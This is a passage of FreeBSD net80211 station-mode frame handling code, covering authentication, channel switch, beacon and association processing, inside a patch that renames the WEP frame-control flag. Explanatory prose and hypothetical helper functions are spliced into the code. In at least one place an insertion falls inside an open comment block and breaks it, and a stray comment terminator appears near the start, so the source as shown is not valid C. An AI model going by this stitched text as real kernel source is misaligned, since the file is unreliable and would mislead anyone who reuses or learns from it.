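The -/+ hunks in this file are part of the mechanical rename of IEEE80211_FC1_WEP to IEEE80211_FC1_PROTECTED (the standard's "Protected Frame" bit); the flag value and the surrounding logic are unchanged. A trivial illustrative use of the new name (hypothetical helper, not in the patch):

/* Illustrative only: test the Protected Frame bit under its new name. */
static __inline int
frame_is_protected(const struct ieee80211_frame *wh)
{
    return ((wh->i_fc[1] & IEEE80211_FC1_PROTECTED) != 0);
}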
*/ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "mgt", "%s", "WEP set but PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; goto out; } hdrspace = ieee80211_hdrspace(ic, wh); key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); vap->iv_recv_ctl(ni, m, subtype); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "bad frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static void sta_auth_open(struct ieee80211_node *ni, struct ieee80211_frame *wh, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; if (ni->ni_authmode == IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "open auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX */ return; } if (vap->iv_state != IEEE80211_S_AUTH || seq != IEEE80211_AUTH_OPEN_RESPONSE) { vap->iv_stats.is_rx_bad_auth++; return; } if (status != 0) { IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni, "open auth failed (reason %d)", status); vap->iv_stats.is_rx_auth_fail++; vap->iv_stats.is_rx_authfail_code = status; ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_STATUS); } else ieee80211_new_state(vap, IEEE80211_S_ASSOC, 0); } static void sta_auth_shared(struct ieee80211_node *ni, struct ieee80211_frame *wh, uint8_t *frm, uint8_t *efrm, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; uint8_t *challenge; int estatus; /* * NB: this can happen as we allow pre-shared key * authentication to be enabled w/o wep being turned * on so that configuration of these can be done * in any order. It may be better to enforce the * ordering in which case this check would just be * for sanity/consistency. */ if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", " PRIVACY is disabled"); estatus = IEEE80211_STATUS_ALG; goto bad; } /* * Pre-shared key authentication is evil; accept * it only if explicitly configured (it is supported * mainly for compatibility with clients like OS X). */ if (ni->ni_authmode != IEEE80211_AUTH_AUTO && ni->ni_authmode != IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX maybe a unique error? 
*/ estatus = IEEE80211_STATUS_ALG; goto bad; } challenge = NULL; if (frm + 1 < efrm) { if ((frm[1] + 2) > (efrm - frm)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "ie %d/%d too long", frm[0], (frm[1] + 2) - (efrm - frm)); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (*frm == IEEE80211_ELEMID_CHALLENGE) challenge = frm; frm += frm[1] + 2; } switch (seq) { case IEEE80211_AUTH_SHARED_CHALLENGE: case IEEE80211_AUTH_SHARED_RESPONSE: if (challenge == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", "no challenge"); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (challenge[1] != IEEE80211_CHALLENGE_LEN) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad challenge len %d", challenge[1]); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } default: break; } if (vap->iv_state != IEEE80211_S_AUTH) return; switch (seq) { case IEEE80211_AUTH_SHARED_PASS: if (ni->ni_challenge != NULL) { free(ni->ni_challenge, M_80211_NODE); ni->ni_challenge = NULL; } if (status != 0) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, wh, "shared key auth failed (reason %d)", status); vap->iv_stats.is_rx_auth_fail++; vap->iv_stats.is_rx_authfail_code = status; return; } ieee80211_new_state(vap, IEEE80211_S_ASSOC, 0); break; case IEEE80211_AUTH_SHARED_CHALLENGE: if (!ieee80211_alloc_challenge(ni)) return; /* XXX could optimize by passing recvd challenge */ memcpy(ni->ni_challenge, &challenge[2], challenge[1]); IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, seq + 1); break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_AUTH, wh, "shared key auth", "bad seq %d", seq); vap->iv_stats.is_rx_bad_auth++; return; } return; bad: /* * Kick the state machine. This short-circuits * using the mgt frame timeout to trigger the * state transition. */ if (vap->iv_state == IEEE80211_S_AUTH) ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_STATUS); } int ieee80211_parse_wmeparams(struct ieee80211vap *vap, uint8_t *frm, const struct ieee80211_frame *wh) { #define MS(_v, _f) (((_v) & _f) >> _f##_S) struct ieee80211_wme_state *wme = &vap->iv_ic->ic_wme; u_int len = frm[1], qosinfo; int i; if (len < sizeof(struct ieee80211_wme_param)-2) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WME, wh, "WME", "too short, len %u", len); return -1; } qosinfo = frm[__offsetof(struct ieee80211_wme_param, param_qosInfo)]; qosinfo &= WME_QOSINFO_COUNT; /* XXX do proper check for wraparound */ if (qosinfo == wme->wme_wmeChanParams.cap_info) return 0; frm += __offsetof(struct ieee80211_wme_param, params_acParams); for (i = 0; i < WME_NUM_AC; i++) { struct wmeParams *wmep = &wme->wme_wmeChanParams.cap_wmeParams[i]; /* NB: ACI not used */ wmep->wmep_acm = MS(frm[0], WME_PARAM_ACM); wmep->wmep_aifsn = MS(frm[0], WME_PARAM_AIFSN); wmep->wmep_logcwmin = MS(frm[1], WME_PARAM_LOGCWMIN); wmep->wmep_logcwmax = MS(frm[1], WME_PARAM_LOGCWMAX); wmep->wmep_txopLimit = LE_READ_2(frm+2); frm += 4; } wme->wme_wmeChanParams.cap_info = qosinfo; return 1; #undef MS } /* * Process 11h Channel Switch Announcement (CSA) ie. If this * is the first CSA then initiate the switch. Otherwise we * track state and trigger completion and/or cancel of the switch. 
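For reference, the element consumed by the CSA parser below is the three-octet 802.11h Channel Switch Announcement body (switch mode, new channel number, switch count), which the code reads through the csa_mode/csa_newchan/csa_count fields. A stand-alone sketch of the same layout (hypothetical helper, not from the patch):

/*
 * Hypothetical reader for a raw CSA element: frm[0] is the element id,
 * frm[1] the length (always 3), followed by mode, new channel, count.
 */
static int
example_read_csa(const uint8_t *frm, uint8_t *mode, uint8_t *newchan,
    uint8_t *count)
{
    if (frm[1] != 3)            /* CSA body is always 3 octets */
        return (EINVAL);
    *mode = frm[2];
    *newchan = frm[3];
    *count = frm[4];
    return (0);
}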
* XXX should be public for IBSS use */ static void ieee80211_parse_csaparams(struct ieee80211vap *vap, uint8_t *frm, const struct ieee80211_frame *wh) { struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_csa_ie *csa = (const struct ieee80211_csa_ie *) frm; KASSERT(vap->iv_state >= IEEE80211_S_RUN, ("state %s", ieee80211_state_name[vap->iv_state])); if (csa->csa_mode > 1) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_DOTH, wh, "CSA", "invalid mode %u", csa->csa_mode); return; } IEEE80211_LOCK(ic); if ((ic->ic_flags & IEEE80211_F_CSAPENDING) == 0) { /* * Convert the channel number to a channel reference. We * try first to preserve turbo attribute of the current * channel then fallback. Note this will not work if the * CSA specifies a channel that requires a band switch (e.g. * 11a => 11g). This is intentional as 11h is defined only * for 5GHz/11a and because the switch does not involve a * reassociation, protocol state (capabilities, negotated * rates, etc) may/will be wrong. */ struct ieee80211_channel *c = ieee80211_find_channel_byieee(ic, csa->csa_newchan, (ic->ic_bsschan->ic_flags & IEEE80211_CHAN_ALLTURBO)); if (c == NULL) { c = ieee80211_find_channel_byieee(ic, csa->csa_newchan, (ic->ic_bsschan->ic_flags & IEEE80211_CHAN_ALL)); if (c == NULL) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_DOTH, wh, "CSA", "invalid channel %u", csa->csa_newchan); goto done; } } #if IEEE80211_CSA_COUNT_MIN > 0 if (csa->csa_count < IEEE80211_CSA_COUNT_MIN) { /* * Require at least IEEE80211_CSA_COUNT_MIN count to * reduce the risk of being redirected by a fabricated * CSA. If a valid CSA is dropped we'll still get a * beacon miss when the AP leaves the channel so we'll * eventually follow to the new channel. * * NOTE: this violates the 11h spec that states that * count may be any value and if 0 then a switch * should happen asap. */ IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_DOTH, wh, "CSA", "count %u too small, must be >= %u", csa->csa_count, IEEE80211_CSA_COUNT_MIN); goto done; } #endif ieee80211_csa_startswitch(ic, c, csa->csa_mode, csa->csa_count); } else { /* * Validate this ie against the initial CSA. We require * mode and channel not change and the count must be * monotonically decreasing. This may be pointless and * canceling the switch as a result may be too paranoid but * in the worst case if we drop out of CSA because of this * and the AP does move then we'll just end up taking a * beacon miss and scan to find the AP. * * XXX may want <= on count as we also process ProbeResp * frames and those may come in w/ the same count as the * previous beacon; but doing so leaves us open to a stuck * count until we add a dead-man timer */ if (!(csa->csa_count < ic->ic_csa_count && csa->csa_mode == ic->ic_csa_mode && csa->csa_newchan == ieee80211_chan2ieee(ic, ic->ic_csa_newchan))) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_DOTH, wh, "CSA ie mismatch, initial ie <%d,%d,%d>, " "this ie <%d,%d,%d>", ic->ic_csa_mode, ic->ic_csa_newchan, ic->ic_csa_count, csa->csa_mode, csa->csa_newchan, csa->csa_count); ieee80211_csa_cancelswitch(ic); } else { if (csa->csa_count <= 1) ieee80211_csa_completeswitch(ic); else ic->ic_csa_count = csa->csa_count; } } done: IEEE80211_UNLOCK(ic); } /* * Return non-zero if a background scan may be continued: * o bg scan is active * o no channel switch is pending * o there has not been any traffic recently * * Note we do not check if there is an administrative enable; * this is only done to start the scan. 
We assume that any * change in state will be accompanied by a request to cancel * active scans which will otherwise cause this test to fail. */ static __inline int contbgscan(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; return ((ic->ic_flags_ext & IEEE80211_FEXT_BGSCAN) && (ic->ic_flags & IEEE80211_F_CSAPENDING) == 0 && vap->iv_state == IEEE80211_S_RUN && /* XXX? */ time_after(ticks, ic->ic_lastdata + vap->iv_bgscanidle)); } /* * Return non-zero if a background scan may be started: * o bg scanning is administratively enabled * o no channel switch is pending * o we are not boosted on a dynamic turbo channel * o there has not been a scan recently * o there has not been any traffic recently */ static __inline int startbgscan(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; return ((vap->iv_flags & IEEE80211_F_BGSCAN) && (ic->ic_flags & IEEE80211_F_CSAPENDING) == 0 && #ifdef IEEE80211_SUPPORT_SUPERG !IEEE80211_IS_CHAN_DTURBO(ic->ic_curchan) && #endif time_after(ticks, ic->ic_lastscan + vap->iv_bgscanintvl) && time_after(ticks, ic->ic_lastdata + vap->iv_bgscanidle)); } static void sta_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { #define ISPROBE(_st) ((_st) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) #define ISREASSOC(_st) ((_st) == IEEE80211_FC0_SUBTYPE_REASSOC_RESP) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; uint8_t *frm, *efrm; uint8_t *rates, *xrates, *wme, *htcap, *htinfo; uint8_t rate; int ht_state_change = 0; wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response frames: * o when scanning, or * o station mode when associated (to collect state * updates such as 802.11g slot time) * Frames otherwise received are discarded. */ if (!((ic->ic_flags & IEEE80211_F_SCAN) || ni->ni_associd)) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* XXX probe response in sta mode when !scanning? */ if (ieee80211_parse_beacon(ni, m0, &scan) != 0) { if (! (ic->ic_flags & IEEE80211_F_SCAN)) vap->iv_stats.is_beacon_bad++; return; } /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * When operating in station mode, check for state updates. * Be careful to ignore beacons received while doing a * background scan. We consider only 11g/WMM stuff right now.
*/ if (ni->ni_associd != 0 && ((ic->ic_flags & IEEE80211_F_SCAN) == 0 || IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_bssid))) { /* record tsf of last beacon */ memcpy(ni->ni_tstamp.data, scan.tstamp, sizeof(ni->ni_tstamp)); /* count beacon frame for s/w bmiss handling */ vap->iv_swbmiss_count++; vap->iv_bmiss_count = 0; if (ni->ni_erp != scan.erp) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "erp change: was 0x%x, now 0x%x", ni->ni_erp, scan.erp); if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && (ni->ni_erp & IEEE80211_ERP_USE_PROTECTION)) ic->ic_flags |= IEEE80211_F_USEPROT; else ic->ic_flags &= ~IEEE80211_F_USEPROT; ni->ni_erp = scan.erp; /* XXX statistic */ /* XXX driver notification */ } if ((ni->ni_capinfo ^ scan.capinfo) & IEEE80211_CAPINFO_SHORT_SLOTTIME) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "capabilities change: was 0x%x, now 0x%x", ni->ni_capinfo, scan.capinfo); /* * NB: we assume short preamble doesn't * change dynamically */ ieee80211_set_shortslottime(ic, IEEE80211_IS_CHAN_A(ic->ic_bsschan) || (scan.capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME)); ni->ni_capinfo = (ni->ni_capinfo &~ IEEE80211_CAPINFO_SHORT_SLOTTIME) | (scan.capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME); /* XXX statistic */ } if (scan.wme != NULL && (ni->ni_flags & IEEE80211_NODE_QOS) && ieee80211_parse_wmeparams(vap, scan.wme, wh) > 0) ieee80211_wme_updateparams(vap); #ifdef IEEE80211_SUPPORT_SUPERG if (scan.ath != NULL) ieee80211_parse_athparams(ni, scan.ath, wh); #endif if (scan.htcap != NULL && scan.htinfo != NULL && (vap->iv_flags_ht & IEEE80211_FHT_HT)) { /* XXX state changes? */ if (ieee80211_ht_updateparams(ni, scan.htcap, scan.htinfo)) ht_state_change = 1; } if (scan.quiet) ic->ic_set_quiet(ni, scan.quiet); if (scan.tim != NULL) { struct ieee80211_tim_ie *tim = (struct ieee80211_tim_ie *) scan.tim; #if 0 int aid = IEEE80211_AID(ni->ni_associd); int ix = aid / NBBY; int min = tim->tim_bitctl &~ 1; int max = tim->tim_len + min - 4; if ((tim->tim_bitctl&1) || (min <= ix && ix <= max && isset(tim->tim_bitmap - min, aid))) { /* * XXX Do not let bg scan kick off * we are expecting data. */ ic->ic_lastdata = ticks; vap->iv_sta_ps(vap, 0); } #endif ni->ni_dtim_count = tim->tim_count; ni->ni_dtim_period = tim->tim_period; } if (scan.csa != NULL && (vap->iv_flags & IEEE80211_F_DOTH)) ieee80211_parse_csaparams(vap, scan.csa, wh); else if (ic->ic_flags & IEEE80211_F_CSAPENDING) { /* * No CSA ie or 11h disabled, but a channel * switch is pending; drop out so we aren't * stuck in CSA state. If the AP really is * moving we'll get a beacon miss and scan. */ IEEE80211_LOCK(ic); ieee80211_csa_cancelswitch(ic); IEEE80211_UNLOCK(ic); } /* * If scanning, pass the info to the scan module. * Otherwise, check if it's the right time to do * a background scan. Background scanning must * be enabled and we must not be operating in the * turbo phase of dynamic turbo mode. Then, * it's been a while since the last background * scan and if no data frames have come through * recently, kick off a scan. Note that this * is the mechanism by which a background scan * is started _and_ continued each time we * return on-channel to receive a beacon from * our ap. 
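The disabled (#if 0) block above computes whether the received TIM reports buffered traffic for our association ID. Pulled out as a standalone helper for clarity (illustrative only; same arithmetic as the disabled code, with the caller expected to pass IEEE80211_AID(ni->ni_associd)):

/*
 * Illustrative only: does the TIM's partial virtual bitmap, whose octet
 * offset is carried in tim_bitctl, cover and set the bit for this AID?
 */
static __inline int
tim_has_traffic(const struct ieee80211_tim_ie *tim, uint16_t aid)
{
    int ix = aid / NBBY;                /* octet index of our AID */
    int min = tim->tim_bitctl & ~1;     /* bitmap offset (octets) */
    int max = tim->tim_len + min - 4;   /* last octet present */

    return ((tim->tim_bitctl & 1) ||    /* group traffic buffered */
        (min <= ix && ix <= max && isset(tim->tim_bitmap - min, aid)));
}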
*/ if (ic->ic_flags & IEEE80211_F_SCAN) { ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); } else if (contbgscan(vap)) { ieee80211_bg_scan(vap, 0); } else if (startbgscan(vap)) { vap->iv_stats.is_scan_bg++; #if 0 /* wakeup if we are sleeing */ ieee80211_set_pwrsave(vap, 0); #endif ieee80211_bg_scan(vap, 0); } /* * If we've had a channel width change (eg HT20<->HT40) * then schedule a delayed driver notification. */ if (ht_state_change) ieee80211_update_chw(ic); return; } /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } break; } case IEEE80211_FC0_SUBTYPE_AUTH: { uint16_t algo, seq, status; /* * auth frame format * [2] algorithm * [2] sequence * [2] status * [tlv*] challenge */ IEEE80211_VERIFY_LENGTH(efrm - frm, 6, return); algo = le16toh(*(uint16_t *)frm); seq = le16toh(*(uint16_t *)(frm + 2)); status = le16toh(*(uint16_t *)(frm + 4)); IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH, wh->i_addr2, "recv auth frame with algorithm %d seq %d", algo, seq); if (vap->iv_flags & IEEE80211_F_COUNTERM) { IEEE80211_DISCARD(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_CRYPTO, wh, "auth", "%s", "TKIP countermeasures enabled"); vap->iv_stats.is_rx_auth_countermeasures++; if (vap->iv_opmode == IEEE80211_M_HOSTAP) { ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, IEEE80211_REASON_MIC_FAILURE); } return; } if (algo == IEEE80211_AUTH_ALG_SHARED) sta_auth_shared(ni, wh, frm + 6, efrm, rssi, nf, seq, status); else if (algo == IEEE80211_AUTH_ALG_OPEN) sta_auth_open(ni, wh, rssi, nf, seq, status); else { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "auth", "unsupported alg %d", algo); vap->iv_stats.is_rx_auth_unsupported++; return; } break; } case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: { uint16_t capinfo, associd; uint16_t status; if (vap->iv_state != IEEE80211_S_ASSOC) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* * asresp frame format * [2] capability information * [2] status * [2] association ID * [tlv] supported rates * [tlv] extended supported rates * [tlv] WME * [tlv] HT capabilities * [tlv] HT info */ IEEE80211_VERIFY_LENGTH(efrm - frm, 6, return); ni = vap->iv_bss; capinfo = le16toh(*(uint16_t *)frm); frm += 2; status = le16toh(*(uint16_t *)frm); frm += 2; if (status != 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "%sassoc failed (reason %d)", ISREASSOC(subtype) ? "re" : "", status); vap->iv_stats.is_rx_auth_fail++; /* XXX */ return; } associd = le16toh(*(uint16_t *)frm); frm += 2; rates = xrates = wme = htcap = htinfo = NULL; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; case IEEE80211_ELEMID_HTCAP: htcap = frm; break; case IEEE80211_ELEMID_HTINFO: htinfo = frm; break; case IEEE80211_ELEMID_VENDOR: if (iswmeoui(frm)) wme = frm; else if (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT) { /* * Accept pre-draft HT ie's if the * standard ones have not been seen. 
*/ if (ishtcapoui(frm)) { if (htcap == NULL) htcap = frm; } else if (ishtinfooui(frm)) { if (htinfo == NULL) htinfo = frm; } } /* XXX Atheros OUI support */ break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); rate = ieee80211_setup_rates(ni, rates, xrates, IEEE80211_F_JOIN | IEEE80211_F_DOSORT | IEEE80211_F_DOFRATE | IEEE80211_F_DONEGO | IEEE80211_F_DODEL); if (rate & IEEE80211_RATE_BASIC) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "%sassoc failed (rate set mismatch)", ISREASSOC(subtype) ? "re" : ""); vap->iv_stats.is_rx_assoc_norate++; ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_STATUS); return; } ni->ni_capinfo = capinfo; ni->ni_associd = associd; if (ni->ni_jointime == 0) ni->ni_jointime = time_uptime; if (wme != NULL && ieee80211_parse_wmeparams(vap, wme, wh) >= 0) { ni->ni_flags |= IEEE80211_NODE_QOS; ieee80211_wme_updateparams(vap); } else ni->ni_flags &= ~IEEE80211_NODE_QOS; /* * Setup HT state according to the negotiation. * * NB: shouldn't need to check if HT use is enabled but some * ap's send back HT ie's even when we don't indicate we * are HT capable in our AssocReq. */ if (htcap != NULL && htinfo != NULL && (vap->iv_flags_ht & IEEE80211_FHT_HT)) { ieee80211_ht_node_init(ni); ieee80211_ht_updateparams(ni, htcap, htinfo); ieee80211_setup_htrates(ni, htcap, IEEE80211_F_JOIN | IEEE80211_F_DOBRS); ieee80211_setup_basic_htrates(ni, htinfo); ieee80211_node_setuptxparms(ni); ieee80211_ratectl_node_init(ni); } else { #ifdef IEEE80211_SUPPORT_SUPERG if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_ATH)) ieee80211_ff_node_init(ni); #endif } /* * Configure state now that we are associated. * * XXX may need different/additional driver callbacks? */ if (IEEE80211_IS_CHAN_A(ic->ic_curchan) || (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) { ic->ic_flags |= IEEE80211_F_SHPREAMBLE; ic->ic_flags &= ~IEEE80211_F_USEBARKER; } else { ic->ic_flags &= ~IEEE80211_F_SHPREAMBLE; ic->ic_flags |= IEEE80211_F_USEBARKER; } ieee80211_set_shortslottime(ic, IEEE80211_IS_CHAN_A(ic->ic_curchan) || (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME)); /* * Honor ERP protection. * * NB: ni_erp should zero for non-11g operation. */ if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && (ni->ni_erp & IEEE80211_ERP_USE_PROTECTION)) ic->ic_flags |= IEEE80211_F_USEPROT; else ic->ic_flags &= ~IEEE80211_F_USEPROT; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_DEBUG, wh->i_addr2, "%sassoc success at aid %d: %s preamble, %s slot time%s%s%s%s%s%s%s%s", ISREASSOC(subtype) ? "re" : "", IEEE80211_NODE_AID(ni), ic->ic_flags&IEEE80211_F_SHPREAMBLE ? "short" : "long", ic->ic_flags&IEEE80211_F_SHSLOT ? "short" : "long", ic->ic_flags&IEEE80211_F_USEPROT ? ", protection" : "", ni->ni_flags & IEEE80211_NODE_QOS ? ", QoS" : "", ni->ni_flags & IEEE80211_NODE_HT ? (ni->ni_chw == 40 ? ", HT40" : ", HT20") : "", ni->ni_flags & IEEE80211_NODE_AMPDU ? " (+AMPDU)" : "", ni->ni_flags & IEEE80211_NODE_MIMO_RTS ? " (+SMPS-DYN)" : ni->ni_flags & IEEE80211_NODE_MIMO_PS ? " (+SMPS)" : "", ni->ni_flags & IEEE80211_NODE_RIFS ? " (+RIFS)" : "", IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_FF) ? ", fast-frames" : "", IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_TURBOP) ? 
", turbo" : "" ); ieee80211_new_state(vap, IEEE80211_S_RUN, subtype); break; } case IEEE80211_FC0_SUBTYPE_DEAUTH: { uint16_t reason; if (vap->iv_state == IEEE80211_S_SCAN) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr)) { /* NB: can happen when in promiscuous mode */ vap->iv_stats.is_rx_mgtdiscard++; break; } /* * deauth frame format * [2] reason */ IEEE80211_VERIFY_LENGTH(efrm - frm, 2, return); reason = le16toh(*(uint16_t *)frm); vap->iv_stats.is_rx_deauth++; vap->iv_stats.is_rx_deauth_code = reason; IEEE80211_NODE_STAT(ni, rx_deauth); IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "recv deauthenticate (reason %d)", reason); ieee80211_new_state(vap, IEEE80211_S_AUTH, (reason << 8) | IEEE80211_FC0_SUBTYPE_DEAUTH); break; } case IEEE80211_FC0_SUBTYPE_DISASSOC: { uint16_t reason; if (vap->iv_state != IEEE80211_S_RUN && vap->iv_state != IEEE80211_S_ASSOC && vap->iv_state != IEEE80211_S_AUTH) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr)) { /* NB: can happen when in promiscuous mode */ vap->iv_stats.is_rx_mgtdiscard++; break; } /* * disassoc frame format * [2] reason */ IEEE80211_VERIFY_LENGTH(efrm - frm, 2, return); reason = le16toh(*(uint16_t *)frm); vap->iv_stats.is_rx_disassoc++; vap->iv_stats.is_rx_disassoc_code = reason; IEEE80211_NODE_STAT(ni, rx_disassoc); IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC, ni, "recv disassociate (reason %d)", reason); ieee80211_new_state(vap, IEEE80211_S_ASSOC, 0); break; } case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_ATIM: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } #undef ISREASSOC #undef ISPROBE } static void sta_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } diff --git a/sys/net80211/ieee80211_wds.c b/sys/net80211/ieee80211_wds.c index e0dfaeafff6a..fdeaf25f06ae 100644 --- a/sys/net80211/ieee80211_wds.c +++ b/sys/net80211/ieee80211_wds.c @@ -1,800 +1,800 @@ /*- * Copyright (c) 2007-2008 Sam Leffler, 